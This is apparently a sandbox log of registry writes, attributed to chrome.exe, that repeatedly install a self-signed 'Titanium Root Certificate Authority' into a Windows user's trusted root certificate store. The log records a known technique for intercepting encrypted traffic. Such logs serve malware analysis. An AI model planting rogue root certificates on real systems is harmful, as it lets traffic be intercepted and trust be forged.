0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000400000001000000100000002e749b9867a042dda0cb8e3492132d00140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe40f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d19000000010000001000000084bb01296272631242d94ffab4eeb9960200000001000000cc0000001c0000006c000000010000000000000000000000000000000100000043004e003d0054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000005c00000001000000040000000008000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0200000001000000cc0000001c0000006c000000010000000000000000000000000000000100000043004e003d0054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e0030000000000019000000010000001000000084bb01296272631242d94ffab4eeb9960f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe4140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000400000001000000100000002e749b9867a042dda0cb8e3492132d00140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe40f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d19000000010000001000000084bb01296272631242d94ffab4eeb9965c0000000100000004000000000800000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00420041003600320044003000340044002d0031003100330032002d0034004500320030002d0038003400330034002d003800370046004200340031004600430035003000330032007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e0030000000000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00380034004300360039003200390045002d0044003100450043002d0034004500310043002d0038003700460035002d003100330034003000440044003200460035004500390036007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000005c00000001000000040000000008000019000000010000001000000084bb01296272631242d94ffab4eeb9960f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe4140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f0400000001000000100000002e749b9867a042dda0cb8e3492132d000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00380042003400410037003400340045002d0033003400340044002d0034004400440031002d0038004300430031002d003200330032004300430039004600370034004500410046007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000005c00000001000000040000000008000019000000010000001000000084bb01296272631242d94ffab4eeb9960f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe4140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f0400000001000000100000002e749b9867a042dda0cb8e3492132d000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000400000001000000100000002e749b9867a042dda0cb8e3492132d00140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe40f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d19000000010000001000000084bb01296272631242d94ffab4eeb9965c0000000100000004000000000800000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00380030004600390044003800310033002d0030004600460036002d0034003000340032002d0039003100360046002d003100390034004300340036003900360043004300420034007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e0030000000000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340046004500410038004400320042002d0030004500410042002d0034004200460033002d0038003000300041002d003000450030004300320046004100340045003200320045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000005c00000001000000040000000008000019000000010000001000000084bb01296272631242d94ffab4eeb9960f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe4140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f0400000001000000100000002e749b9867a042dda0cb8e3492132d000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00360031003600440043003200320039002d0037003500450035002d0034003100410039002d0039004400330042002d003000460034003600420046003700320032003200310043007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000005c00000001000000040000000008000019000000010000001000000084bb01296272631242d94ffab4eeb9960f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe4140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f0400000001000000100000002e749b9867a042dda0cb8e3492132d000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00420041003600320044003000340044002d0031003100330032002d0034004500320030002d0038003400330034002d003800370046004200340031004600430035003000330032007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000005c00000001000000040000000008000019000000010000001000000084bb01296272631242d94ffab4eeb9960f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe4140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f0400000001000000100000002e749b9867a042dda0cb8e3492132d000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\EF7D96611EBC296503E33BD6D8C4E46D8ADECBE4\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000400000001000000100000002e749b9867a042dda0cb8e3492132d00140000000100000014000000367aad0cfa20b466baac8f7dc2907b563221ed7f030000000100000014000000ef7d96611ebc296503e33bd6d8c4e46d8adecbe40f0000000100000020000000678c479c611bf7826ae2a93ab3da7a699af934444ee7ae39fb028d6d41d0a33d19000000010000001000000084bb01296272631242d94ffab4eeb9965c0000000100000004000000000800000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00380042003400410037003400340045002d0033003400340044002d0034004400440031002d0038004300430031002d003200330032004300430039004600370034004500410046007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e0030000000000020000000010000000a03000030820306308201eea00302010202081cd1d17fc153e023300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233313231323138323333385a170d3237303331373138323333385a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a0282010100c5ad33d1a9f49f7d5eec0c7c59f3e126157a1960dbeb21246076d790790c335a798997f4675fb1d660488775f4c5adf0b970d9d5c23fad51a73101b2a4959e0e5476232b9c149b047f7b9ff6e986ee1fe6f80dafb72d98c074706b7d30ff09f34816e771a4baa41c2343a7c51032b702406673a5c988323e328190a7735e1ddf786af8c2ce3b5512650f27779c5f8b61dcb48318d74954bfd3aeb5628f308bf9174e71458862738f5eb390eb90c769216a7652419bf799d65ce0e8fa9316fb34397b85ea3b320735bb8b63d9f6a7a999bc09ec1f4292b4d5f52b896321c813be33d915933a80eb672291bb8a5d1aa954a64356fafc25bb7e04b61115869340d30203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010027b6dc8e05058df9e324d57657dc6c10fb056db512ea0112ac2aa10d07f7ca7f8df4088ff9d82377c75be63a39a67e68b325c49bdd156f5cf832ea7bd25fc6f3a8042209e5cf4dc6d988b75fe1971888181ad9b3ace277ae12c516438e24efcc720cdaf977e163fa38d8cf71dd88983266801fc063acaa17d39823452910c4b2d165e93102de956b2c464cd1af251debd7edc864563519192addd247b765f5ef89e3df571277713b41eb0ced85c45e611b427327c65655a959faa0b4ee69abe93b5b8f44e789b3aa9e7e8cc0bbb8f15178760c7c6ed9724d2b288498f39614728b92ed27fa7a4d068e31a1e405f9b5991956f0327704757ada83d092e9177c41 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
